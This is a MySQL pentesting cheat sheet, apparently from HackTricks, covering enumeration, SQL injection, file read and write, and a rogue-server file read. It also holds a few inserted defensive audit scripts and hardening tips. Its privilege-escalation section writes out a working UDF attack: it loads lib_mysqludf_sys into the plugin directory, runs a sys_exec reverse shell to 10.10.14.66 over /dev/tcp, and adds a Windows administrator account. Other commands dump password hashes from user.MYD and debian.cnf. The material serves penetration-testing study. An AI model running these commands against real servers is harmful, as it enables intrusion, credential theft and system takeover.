# 3306 - Pentesting Mysql
## **Basic Information**

**MySQL** is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (**SQL**). From [here](https://www.siteground.com/tutorials/php-mysql/mysql/).

**Default port:** 3306

```
3306/tcp open  mysql
```

## **Connect**

### **Local**

```bash
mysql -u root     # Connect to root without password
mysql -u root -p  # A password will be asked for
```

### Remote

MySQL allows remote connections by default, which means that it can be accessed from other machines on the network. This can be a security risk if proper precautions are not taken.

To secure remote access to MySQL, you can follow these steps:

1. **Bind MySQL to a specific IP address**: By default, MySQL listens on all available IP addresses. You can change this by modifying the `bind-address` parameter in the MySQL configuration file (`my.cnf`). Set it to the IP address you want MySQL to listen on.
2. **Create a firewall rule**: Configure your firewall to only allow incoming connections to the MySQL port (default is 3306) from trusted IP addresses or networks. This will prevent unauthorized access to the MySQL service.
3. **Use strong passwords**: Ensure that all MySQL user accounts have strong, unique passwords. Avoid using default or easily guessable passwords.
4. **Limit privileges**: Grant only the necessary privileges to MySQL user accounts. Avoid granting unnecessary privileges that could be exploited by an attacker.
5. **Enable SSL/TLS encryption**: Configure MySQL to use SSL/TLS encryption for secure communication between the client and the server. This will protect the data transmitted over the network from eavesdropping and tampering.

By following these steps, you can enhance the security of your MySQL server and reduce the risk of unauthorized access or data breaches.

```bash
mysql -h <hostname> -u root
mysql -h <hostname> -u root@localhost
```

## External Enumeration

Some of the enumeration actions require valid credentials

```bash
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds
```

### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#mysql)

### Write any binary data

```bash
CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)
```

## **MySQL commands**

MySQL is a popular open-source relational database management system, widely used in web applications and known for its speed and reliability. This section covers some commonly used MySQL commands for database management and manipulation.

### **Connecting to MySQL**

To connect to a MySQL server, you can use the following command:

```bash
mysql -h <host> -u <user> -p
```

Replace `<host>` with the hostname or IP address of the MySQL server and `<user>` with the username; `-p` makes the client prompt for the password.

### **Creating a Database**

To create a new database, use the `CREATE DATABASE` command:

```sql
CREATE DATABASE <database_name>;
```

Replace `<database_name>` with the desired name for the database.
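As an added example (not code from the HackTricks page), the following Python audits a `[mysqld]` config fragment for the settings the hardening steps above refer to: the `bind-address`, whether TLS is required (`require_secure_transport`), the OS user the server runs as, `secure_file_priv`, `local_infile` and `debug`. Both config samples are constructed for the example.

```python
"""Audit a my.cnf / mysqld.cnf [mysqld] section for weak settings."""
import configparser
import io

# Constructed sample configs: one weak, one hardened [mysqld] section.
WEAK_CNF = """
[mysqld]
user = root
bind-address = 0.0.0.0
local_infile = ON
secure_file_priv =
debug = d:t:o,/tmp/mysqld.trace
"""

HARDENED_CNF = """
[mysqld]
user = mysql
bind-address = 10.0.0.5
require_secure_transport = ON
local_infile = OFF
secure_file_priv = /var/lib/mysql-files
"""


def parse_mysqld(cnf_text):
    """Return the [mysqld] section as a dict of normalised option names.

    my.cnf treats '-' and '_' in option names as equivalent and allows
    bare flags with no '=', so both forms are normalised here."""
    parser = configparser.ConfigParser(allow_no_value=True, strict=False,
                                       interpolation=None)
    parser.read_file(io.StringIO(cnf_text))
    if not parser.has_section("mysqld"):
        return {}
    return {k.replace("-", "_"): (v or "") for k, v in parser.items("mysqld")}


def audit_mysqld(cnf_text):
    """Return a list of findings (strings) for the [mysqld] section."""
    opts = parse_mysqld(cnf_text)
    findings = []
    if opts.get("user", "") == "root":
        findings.append("user=root: the server process runs as root")
    if opts.get("bind_address", "") in ("", "0.0.0.0", "*", "::"):
        findings.append("bind-address: listening on all interfaces")
    if opts.get("require_secure_transport", "OFF").upper() not in ("ON", "1"):
        findings.append("require_secure_transport is not ON: plaintext logins allowed")
    if opts.get("local_infile", "OFF").upper() in ("ON", "1"):
        findings.append("local_infile=ON: LOAD DATA LOCAL is enabled")
    if opts.get("secure_file_priv", "") == "":
        findings.append("secure_file_priv not set or empty: FILE users are unrestricted")
    if "debug" in opts:
        findings.append("debug enabled: sensitive data may be written to trace logs")
    return findings


if __name__ == "__main__":
    for name, cnf in (("weak", WEAK_CNF), ("hardened", HARDENED_CNF)):
        print(name, audit_mysqld(cnf) or ["no findings"])
```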
### **Selecting a Database**

To select a database to work with, use the `USE` command:

```sql
USE <database_name>;
```

Replace `<database_name>` with the name of the database you want to select.

### **Creating a Table**

To create a new table in a database, use the `CREATE TABLE` command:

```sql
CREATE TABLE <table_name> (
    <column1> <datatype1>,
    <column2> <datatype2>,
    ...
);
```

Replace `<table_name>` with the desired name for the table, `<column1>` with the name of the first column, `<datatype1>` with the data type of the first column, and so on.

### **Inserting Data**

To insert data into a table, use the `INSERT INTO` command:

```sql
INSERT INTO <table_name> (<column1>, <column2>, ...) VALUES (<value1>, <value2>, ...);
```

Replace `<table_name>` with the name of the table, `<column1>`, `<column2>`, etc. with the names of the columns you want to insert data into, and `<value1>`, `<value2>`, etc. with the corresponding values.

### **Querying Data**

To retrieve data from a table, use the `SELECT` command:

```sql
SELECT <column1>, <column2>, ... FROM <table_name> WHERE <condition>;
```

Replace `<column1>`, `<column2>`, etc. with the names of the columns you want to retrieve, `<table_name>` with the name of the table, and `<condition>` with the condition that the data must meet.

### **Updating Data**

To update data in a table, use the `UPDATE` command:

```sql
UPDATE <table_name> SET <column1> = <value1>, <column2> = <value2>, ... WHERE <condition>;
```

Replace `<table_name>` with the name of the table, `<column1>`, `<column2>`, etc. with the names of the columns you want to update, `<value1>`, `<value2>`, etc. with the new values, and `<condition>` with the condition that the data must meet.

### **Deleting Data**

To delete data from a table, use the `DELETE FROM` command:

```sql
DELETE FROM <table_name> WHERE <condition>;
```

Replace `<table_name>` with the name of the table and `<condition>` with the condition that the data must meet.

### **Dropping a Database**

To drop a database, use the `DROP DATABASE` command:

```sql
DROP DATABASE <database_name>;
```

Replace `<database_name>` with the name of the database you want to drop.

### **Dropping a Table**

To drop a table, use the `DROP TABLE` command:

```sql
DROP TABLE <table_name>;
```

Replace `<table_name>` with the name of the table you want to drop.

These are just a few of the many commands available in MySQL. By mastering these commands, you will have a solid foundation for managing and manipulating databases using MySQL.

```bash
show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;

select version();     #version
select @@version;     #version (system variable, no parentheses)
select user();        #User
select database();    #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<table_name>"

#Read & Write
## You need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';                 # older versions (Password column)
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';    # 5.7+ (authentication_string column)
FLUSH PRIVILEGES;
quit;
```

```bash
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'
```

### MySQL privilege enumeration

When pentesting a MySQL database it is important to understand the privilege configuration of the target. By enumerating MySQL privileges you can determine the privilege level of the current user and look for privilege weaknesses to abuse.

Some common MySQL privilege enumeration techniques:

#### 1. SHOW GRANTS

`SHOW GRANTS` shows all the privileges granted to the current user.

```sql
SHOW GRANTS;
```

#### 2. INFORMATION_SCHEMA

The `INFORMATION_SCHEMA` database stores metadata about databases, tables, columns and privileges. Query it to get detailed privilege information.

```sql
SELECT * FROM INFORMATION_SCHEMA.USER_PRIVILEGES;
```

#### 3. The mysql.user table

The `mysql.user` table contains the details of the MySQL users, including username, password hash and global privileges.

```sql
SELECT * FROM mysql.user;
```

#### 4. SHOW GRANTS FOR

`SHOW GRANTS FOR` shows the privileges of a given user. Replace `<user>` with the user to query.

```sql
SHOW GRANTS FOR <user>;
```

#### 5. The mysql.db table

The `mysql.db` table stores database-level privileges.

```sql
SELECT * FROM mysql.db;
```

#### 6. The mysql.tables_priv table

The `mysql.tables_priv` table stores table-level privileges.

```sql
SELECT * FROM mysql.tables_priv;
```

#### 7. The mysql.columns_priv table

The `mysql.columns_priv` table stores column-level privileges.

```sql
SELECT * FROM mysql.columns_priv;
```

Using these techniques you can better understand the privilege configuration of the target database and spot possible security weaknesses.

```sql
#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';
```

You can see in the docs the meaning of each privilege: [https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv\_execute)

### MySQL File RCE

{% content-ref url="../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md" %}
[mysql-ssrf.md](../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
{% endcontent-ref %}

## MySQL arbitrary read file by client

Actually, when you try to **load data local into a table** the **content of a file**, the MySQL or MariaDB server asks the **client to read it** and send the content. **Then, if you can tamper with a mysql client to connect to your own MySQL server, you can read arbitrary files.**\
Please notice that this is the behaviour using:

```bash
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
```

(Notice the "local" word)\
Because without "local" you may get:

```bash
mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
```

**Initial PoC:** [**https://github.com/allyshka/Rogue-MySql-Server**](https://github.com/allyshka/Rogue-MySql-Server)\
**In this paper you can see a complete description of the attack and even how to extend it to RCE:** [**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\
**Here you can find an overview of the attack:** [**http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/**](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/)
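The privilege enumeration queries above (`file_priv`, `Super_priv`, `mysql.user`) are what an attacker reads; the same rows are what a defender should review. As an added example (not code from the HackTricks page), the following Python takes rows shaped like a `SELECT user,host,file_priv,super_priv,authentication_string FROM mysql.user` result (constructed sample, placeholder hashes) and reports the accounts to look at first.

```python
"""Flag risky accounts in mysql.user rows (constructed sample data)."""

# Constructed rows in the shape of:
#   SELECT user,host,file_priv,super_priv,authentication_string FROM mysql.user;
# The hash values are placeholders, not real password hashes.
SAMPLE_USERS = [
    {"user": "root", "host": "localhost", "file_priv": "Y", "super_priv": "Y",
     "authentication_string": "*PLACEHOLDER_HASH_1"},
    {"user": "root", "host": "%", "file_priv": "Y", "super_priv": "Y",
     "authentication_string": "*PLACEHOLDER_HASH_1"},
    {"user": "app", "host": "%", "file_priv": "Y", "super_priv": "N",
     "authentication_string": "*PLACEHOLDER_HASH_2"},
    {"user": "report", "host": "10.0.0.%", "file_priv": "N", "super_priv": "N",
     "authentication_string": ""},
    {"user": "backup", "host": "localhost", "file_priv": "N", "super_priv": "N",
     "authentication_string": "*PLACEHOLDER_HASH_3"},
]

LOCAL_HOSTS = ("localhost", "127.0.0.1", "::1")


def audit_account(row):
    """Return the list of findings for one mysql.user row."""
    findings = []
    if row.get("file_priv") == "Y":
        findings.append("FILE: can read/write files on the server (load_file, INTO OUTFILE)")
    if row.get("super_priv") == "Y" and row["user"] != "root":
        findings.append("SUPER on a non-root account")
    if row.get("host") == "%":
        findings.append("host '%': login allowed from any address")
    if row["user"] == "root" and row.get("host") not in LOCAL_HOSTS:
        findings.append("root login allowed from a remote host")
    if row.get("authentication_string", "") == "":
        findings.append("empty authentication_string: no password set")
    return findings


def audit_users(rows):
    """Return {(user, host): [findings]} for every row that needs attention."""
    report = {}
    for row in rows:
        findings = audit_account(row)
        if findings:
            report[(row["user"], row["host"])] = findings
    return report


if __name__ == "__main__":
    for (user, host), findings in audit_users(SAMPLE_USERS).items():
        print(f"'{user}'@'{host}':")
        for f in findings:
            print("  -", f)
```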
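The client-side file read above works because the server, not the client, decides when a file is sent: it answers a query with a LOCAL INFILE request packet (payload starting with byte 0xFB, followed by the file name). A proxy or IDS can therefore catch a rogue server by checking whether such a request arrives in response to a query that never contained `LOAD DATA LOCAL`. Added example, not code from the HackTricks page; the packets are constructed for it, and the packet framing (3-byte little-endian length, 1-byte sequence id, payload) is the standard MySQL protocol layout.

```python
"""Detect unsolicited LOCAL INFILE requests in MySQL protocol traffic."""

LOCAL_INFILE_HEADER = 0xFB  # first payload byte of a LOCAL INFILE request


def split_packets(stream):
    """Split a byte stream into (sequence_id, payload) tuples.

    Each packet is: 3-byte little-endian payload length, 1-byte sequence
    id, payload. Parsing stops at a truncated trailing packet."""
    packets = []
    pos = 0
    while pos + 4 <= len(stream):
        length = int.from_bytes(stream[pos:pos + 3], "little")
        seq = stream[pos + 3]
        payload = stream[pos + 4:pos + 4 + length]
        if len(payload) != length:
            break
        packets.append((seq, payload))
        pos += 4 + length
    return packets


def local_infile_requests(server_stream):
    """Return the file names the server asked the client to upload."""
    names = []
    for _seq, payload in split_packets(server_stream):
        if payload and payload[0] == LOCAL_INFILE_HEADER:
            names.append(payload[1:].decode("utf-8", "replace"))
    return names


def client_sent_load_data_local(query_text):
    """True if the client's query text actually issued LOAD DATA LOCAL."""
    words = query_text.upper().split()
    return "LOAD" in words and "DATA" in words and "LOCAL" in words


def is_unsolicited_file_request(query_text, server_stream):
    """Flag a server asking for a file the client never offered to send."""
    return bool(local_infile_requests(server_stream)) and \
        not client_sent_load_data_local(query_text)


def make_packet(seq, payload):
    """Frame one MySQL packet; used only to build the constructed samples."""
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


# Constructed samples: the client sent a plain SELECT; a rogue server replies
# with a LOCAL INFILE request for /etc/passwd, a normal server with an OK packet.
CLIENT_QUERY = "SELECT 1"
ROGUE_RESPONSE = make_packet(1, b"\xfb/etc/passwd")
OK_RESPONSE = make_packet(1, b"\x00\x00\x00\x02\x00\x00\x00")

if __name__ == "__main__":
    print("rogue:", is_unsolicited_file_request(CLIENT_QUERY, ROGUE_RESPONSE))
    print("ok:   ", is_unsolicited_file_request(CLIENT_QUERY, OK_RESPONSE))
```

On the client side the same risk is removed by disabling `LOAD DATA LOCAL` (the mysql client's `--local-infile=0`, or `local_infile=OFF` in the server config), which is the mitigation the check above is meant to verify in traffic.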
## POST

### Mysql User

It will be very interesting if mysql is running as **root**:

```bash
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1
```

#### Dangerous settings of mysqld.cnf

From [https://academy.hackthebox.com/module/112/section/1238](https://academy.hackthebox.com/module/112/section/1238)

| **Setting** | **Description** |
| ------------------ | ------------------------------------------------------------------------------------------------------------------------------------ |
| `user` | Sets which user the MySQL service will run as. |
| `password` | Sets the password for the MySQL user. |
| `admin_address` | The IP address on which to listen for TCP/IP connections on the administrative network interface. |
| `debug` | This variable indicates the current debugging settings (sensitive information in logs). |
| `sql_warnings` | This variable controls whether single-row INSERT statements produce an information string if warnings occur (sensitive information in logs). |
| `secure_file_priv` | This variable is used to limit the effect of data import and export operations. |

### Privilege escalation

```bash
# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;

# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password= -e "SELECT * FROM mysql.user;"

# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

# Get a shell (with your permissions, useful for sudo/suid privesc)
\! sh
```

### Privilege Escalation via library

If the **mysql server is running as root** (or a different, more privileged user) you can make it execute commands. For that, you need to use **user defined functions**, and to create a user defined function you will need a **library** for the OS that is running mysql.

The malicious library to use can be found inside sqlmap and inside metasploit by doing **`locate "*lib_mysqludf_sys*"`**. The **`.so`** files are **Linux** libraries and the **`.dll`** are the **Windows** ones; choose the one you need.

If you **don't have** those libraries, you can either **look for them**, or download this [**Linux C code**](https://www.exploit-db.com/exploits/1518) and **compile it inside the vulnerable Linux machine**:

```bash
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
```

Now that you have the library, login to Mysql as a privileged user (root?) and follow the next steps:

#### Linux

```sql
# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';

# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';

# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';

# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
```

#### Windows

MySQL can be installed on Windows using the official installer available on the MySQL website. Once installed, the MySQL service runs in the background.

To connect to the MySQL server on Windows, you can use the MySQL Command Line Client or a graphical user interface (GUI) tool like MySQL Workbench. For the command line client, open the Command Prompt and type `mysql -u <username> -p`, replacing `<username>` with the user you want to connect as; you will be prompted for that user's password.

To use a GUI tool like MySQL Workbench, download and install it from the MySQL website, open it and click the "+" icon in the "MySQL Connections" section to create a new connection. Enter the connection name, hostname, port, username and password, and click "Test Connection" to verify it. Once connected you can create databases and tables and execute SQL queries.

```sql
# Check the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
```

### Extracting MySQL credentials from files

Inside _/etc/mysql/debian.cnf_ you can find the **plain-text password** of the user **debian-sys-maint**.

```bash
cat /etc/mysql/debian.cnf
```

You can **use these credentials to login to the mysql database**.

Inside the file _/var/lib/mysql/mysql/user.MYD_ you can find **all the hashes of the MySQL users** (the ones that you can extract from mysql.user inside the database).

You can extract them doing:

```bash
# a-zA-Z: the range a-Z is invalid in most grep implementations
grep -oaE "[-_\.\*a-zA-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
```

### Enabling logging

You can enable logging of mysql queries inside `/etc/mysql/my.cnf` by uncommenting the following lines:

![](<../.gitbook/assets/image (277).png>)

### Useful files

Configuration Files

* windows \*
  * config.ini
  * my.ini
    * windows\my.ini
    * winnt\my.ini
  * \<InstDir>/mysql/data/
* unix
  * my.cnf
    * /etc/my.cnf
    * /etc/mysql/my.cnf
    * /var/lib/mysql/my.cnf
    * \~/.my.cnf
    * /etc/my.cnf
* Command History
  * \~/.mysql.history
* Log Files
  * connections.log
  * update.log
  * common.log

## Default MySQL Database/Tables

{% tabs %}
{% tab title="information_schema" %}
ALL\_PLUGINS\ APPLICABLE\_ROLES\ CHARACTER\_SETS\ CHECK\_CONSTRAINTS\ COLLATIONS\ COLLATION\_CHARACTER\_SET\_APPLICABILITY\ COLUMNS\ COLUMN\_PRIVILEGES\ ENABLED\_ROLES\ ENGINES\ EVENTS\ FILES\ GLOBAL\_STATUS\ GLOBAL\_VARIABLES\ KEY\_COLUMN\_USAGE\ KEY\_CACHES\ OPTIMIZER\_TRACE\ PARAMETERS\ PARTITIONS\ PLUGINS\ PROCESSLIST\ PROFILING\ REFERENTIAL\_CONSTRAINTS\ ROUTINES\ SCHEMATA\ SCHEMA\_PRIVILEGES\ SESSION\_STATUS\ SESSION\_VARIABLES\ STATISTICS\ SYSTEM\_VARIABLES\ TABLES\ TABLESPACES\ TABLE\_CONSTRAINTS\ TABLE\_PRIVILEGES\ TRIGGERS\ USER\_PRIVILEGES\ VIEWS\ INNODB\_LOCKS\ INNODB\_TRX\ INNODB\_SYS\_DATAFILES\ INNODB\_FT\_CONFIG\ INNODB\_SYS\_VIRTUAL\ INNODB\_CMP\ INNODB\_FT\_BEING\_DELETED\ INNODB\_CMP\_RESET\ INNODB\_CMP\_PER\_INDEX\ INNODB\_CMPMEM\_RESET\ INNODB\_FT\_DELETED\ INNODB\_BUFFER\_PAGE\_LRU\ INNODB\_LOCK\_WAITS\ INNODB\_TEMP\_TABLE\_INFO\ INNODB\_SYS\_INDEXES\ INNODB\_SYS\_TABLES\ INNODB\_SYS\_FIELDS\ INNODB\_CMP\_PER\_INDEX\_RESET\ INNODB\_BUFFER\_PAGE\ INNODB\_FT\_DEFAULT\_STOPWORD\ INNODB\_FT\_INDEX\_TABLE\ INNODB\_FT\_INDEX\_CACHE\ INNODB\_SYS\_TABLESPACES\ INNODB\_METRICS\ INNODB\_SYS\_FOREIGN\_COLS\ INNODB\_CMPMEM\ INNODB\_BUFFER\_POOL\_STATS\ INNODB\_SYS\_COLUMNS\ INNODB\_SYS\_FOREIGN\ INNODB\_SYS\_TABLESTATS\ GEOMETRY\_COLUMNS\ SPATIAL\_REF\_SYS\ CLIENT\_STATISTICS\ INDEX\_STATISTICS\ USER\_STATISTICS\ INNODB\_MUTEXES\ TABLE\_STATISTICS\ INNODB\_TABLESPACES\_ENCRYPTION\ user\_variables\ INNODB\_TABLESPACES\_SCRUBBING\ INNODB\_SYS\_SEMAPHORE\_WAITS
{% endtab %}
{% tab title="mysql" %}
columns\_priv\ column\_stats\ db\ engine\_cost\ event\ func\ general\_log\ gtid\_executed\ gtid\_slave\_pos\ help\_category\ help\_keyword\ help\_relation\ help\_topic\ host\ index\_stats\ innodb\_index\_stats\ innodb\_table\_stats\ ndb\_binlog\_index\ 
plugin\ proc\ procs\_priv\ proxies\_priv\ roles\_mapping\ server\_cost\ servers\ slave\_master\_info\ slave\_relay\_log\_info\ slave\_worker\_info\ slow\_log\ tables\_priv\ table\_stats\ time\_zone\ time\_zone\_leap\_second\ time\_zone\_name\ time\_zone\_transition\ time\_zone\_transition\_type\ transaction\_registry\ user {% endtab %} {% tab title="performance_schema" %} accounts\ cond\_instances\ events\_stages\_current\ events\_stages\_history\ events\_stages\_history\_long\ events\_stages\_summary\_by\_account\_by\_event\_name\ events\_stages\_summary\_by\_host\_by\_event\_name\ events\_stages\_summary\_by\_thread\_by\_event\_name\ events\_stages\_summary\_by\_user\_by\_event\_name\ events\_stages\_summary\_global\_by\_event\_name\ events\_statements\_current\ events\_statements\_history\ events\_statements\_history\_long\ events\_statements\_summary\_by\_account\_by\_event\_name\ events\_statements\_summary\_by\_digest\ events\_statements\_summary\_by\_host\_by\_event\_name\ events\_statements\_summary\_by\_program\ events\_statements\_summary\_by\_thread\_by\_event\_name\ events\_statements\_summary\_by\_user\_by\_event\_name\ events\_statements\_summary\_global\_by\_event\_name\ events\_transactions\_current\ events\_transactions\_history\ events\_transactions\_history\_long\ events\_transactions\_summary\_by\_account\_by\_event\_name\ events\_transactions\_summary\_by\_host\_by\_event\_name\ events\_transactions\_summary\_by\_thread\_by\_event\_name\ events\_transactions\_summary\_by\_user\_by\_event\_name\ events\_transactions\_summary\_global\_by\_event\_name\ events\_waits\_current\ events\_waits\_history\ events\_waits\_history\_long\ events\_waits\_summary\_by\_account\_by\_event\_name\ events\_waits\_summary\_by\_host\_by\_event\_name\ events\_waits\_summary\_by\_instance\ events\_waits\_summary\_by\_thread\_by\_event\_name\ events\_waits\_summary\_by\_user\_by\_event\_name\ events\_waits\_summary\_global\_by\_event\_name\ file\_instances\ 
file\_summary\_by\_event\_name\ file\_summary\_by\_instance\ global\_status\ global\_variables\ host\_cache\ hosts\ memory\_summary\_by\_account\_by\_event\_name\ memory\_summary\_by\_host\_by\_event\_name\ memory\_summary\_by\_thread\_by\_event\_name\ memory\_summary\_by\_user\_by\_event\_name\ memory\_summary\_global\_by\_event\_name\ metadata\_locks\ mutex\_instances\ objects\_summary\_global\_by\_type\ performance\_timers\ prepared\_statements\_instances\ replication\_applier\_configuration\ replication\_applier\_status\ replication\_applier\_status\_by\_coordinator\ replication\_applier\_status\_by\_worker\ replication\_connection\_configuration\ replication\_connection\_status\ replication\_group\_member\_stats\ replication\_group\_members\ rwlock\_instances\ session\_account\_connect\_attrs\ session\_connect\_attrs\ session\_status\ session\_variables\ setup\_actors\ setup\_consumers\ setup\_instruments\ setup\_objects\ setup\_timers\ socket\_instances\ socket\_summary\_by\_event\_name\ socket\_summary\_by\_instance\ status\_by\_account\ status\_by\_host\ status\_by\_thread\ status\_by\_user\ table\_handles\ table\_io\_waits\_summary\_by\_index\_usage\ table\_io\_waits\_summary\_by\_table\ table\_lock\_waits\_summary\_by\_table\ threads\ user\_variables\_by\_thread\ users\ variables\_by\_thread {% endtab %} {% tab title="sys" %} host\_summary\ host_summary_by_file_io\ host_summary_by_file_io_type\ host_summary_by_stages\ host_summary_by_statement_latency\ host_summary_by_statement_type\ innodb_buffer_stats_by_schema\ innodb_buffer_stats_by_table\ innodb_lock_waits\ io_by_thread_by_latency\ io_global_by_file_by_bytes\ io_global_by_file_by_latency\ io_global_by_wait_by_bytes\ io_global_by_wait_by_latency\ latest_file_io\ memory_by_host_by_current_bytes\ memory_by_thread_by_current_bytes\ memory_by_user_by_current_bytes\ memory_global_by_current_bytes\ memory_global_total\ metrics\ processlist\ ps_check_lost_instrumentation\ schema_auto_increment_columns\ 
schema_index_statistics\ schema_object_overview\ schema_redundant_indexes\ schema_table_lock_waits\ schema_table_statistics\ schema_table_statistics_with_buffer\ schema_tables_with_full_table_scans\ schema_unused_indexes\ session\ session_ssl_status\ statement_analysis\ statements_with_errors_or_warnings\ statements_with_full_table_scans\ statements_with_runtimes_in_95th_percentile\ statements_with_sorting\ statements_with_temp_tables\ sys_config\ user_summary\ user_summary_by_file_io\ user_summary_by_file_io_type\ user_summary_by_stages\ user_summary_by_statement_latency\ user_summary_by_statement_type\ version\ wait_classes_global_by_avg_latency\ wait_classes_global_by_latency\ waits_by_host_by_latency\ waits_by_user_by_latency\ waits_global_by_latency\ x$host_summary\ x$host_summary_by_file_io\ x$host_summary_by_file_io_type\ x$host_summary_by_stages\ x$host_summary_by_statement_latency\ x$host_summary_by_statement_type\ x$innodb_buffer_stats_by_schema\ x$innodb_buffer_stats_by_table\ x$innodb_lock_waits\ x$io_by_thread_by_latency\ x$io_global_by_file_by_bytes\ x$io_global_by_file_by_latency\ x$io_global_by_wait_by_bytes\ x$io_global_by_wait_by_latency\ x$latest_file_io\ x$memory_by_host_by_current_bytes\ x$memory_by_thread_by_current_bytes\ x$memory_by_user_by_current_bytes\ x$memory_global_by_current_bytes\ x$memory_global_total\ x$processlist\ x$ps_digest_95th_percentile_by_avg_us\ x$ps_digest_avg_latency_distribution\ x$ps_schema_table_statistics_io\ x$schema_flattened_keys\ x$schema_index_statistics\ x$schema_table_lock_waits\ x$schema_table_statistics\ x$schema_table_statistics_with_buffer\ x$schema_tables_with_full_table_scans\ x$session\ x$statement_analysis\ x$statements_with_errors_or_warnings\ x$statements_with_full_table_scans\ x$statements_with_runtimes_in_95th_percentile\ x$statements_with_sorting\ x$statements_with_temp_tables\ x$user_summary\ x$user_summary_by_file_io\ x$user_summary_by_file_io_type\ x$user_summary_by_stages\ 
x$user_summary_by_statement_latency\ x$user_summary_by_statement_type\ x$wait_classes_global_by_avg_latency\ x$wait_classes_global_by_latency\ x$waits_by_host_by_latency\ x$waits_by_user_by_latency\ x$waits_global_by_latency
{% endtab %}
{% endtabs %}

## HackTricks Automatic Commands

```
Protocol_Name: MySql    #Protocol Abbreviation if there is one.
Port_Number:  3306     #Comma separated if there is more than one.
Protocol_Description: MySql        #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for MySql
  Note: |
    MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

    https://book.hacktricks.xyz/pentesting/pentesting-mysql

Entry_2:
  Name: Nmap
  Description: Nmap with MySql Scripts
  Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

Entry_3:
  Name: MySql
  Description: Attempt to connect to mysql server
  Command: mysql -h {IP} -u {Username}@localhost

Entry_4:
  Name: MySql consolesless mfs enumeration
  Description: MySql enumeration without the need to run msfconsole
  Note: sourced from https://github.com/carlospolop/legion
